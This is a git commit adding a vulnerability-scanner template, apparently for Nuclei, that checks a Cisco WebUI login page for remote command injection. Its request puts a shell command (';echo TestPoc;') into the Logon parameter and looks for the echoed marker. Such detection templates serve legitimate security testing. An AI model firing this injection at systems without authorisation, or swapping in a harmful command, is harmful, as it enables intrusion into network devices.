Create cisco-webui-rce.yaml

patch-1
PikPikcU 2021-02-19 14:39:32 +07:00 committed by GitHub
parent 733922c32d
commit e537b279a0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

View File

@ -0,0 +1,22 @@
id: cisco-webui-rce
info:
name: Cisco WebUI 1.5b6 RCE
author: pikpikcu
severity: critical
refrence: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190513-webui
requests:
- method: GET
path:
- '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20TestPoc%3B%27'
matchers-condition: and
matchers:
- type: word
words:
- "TestPoc"
part: body
- type: status
status:
- 200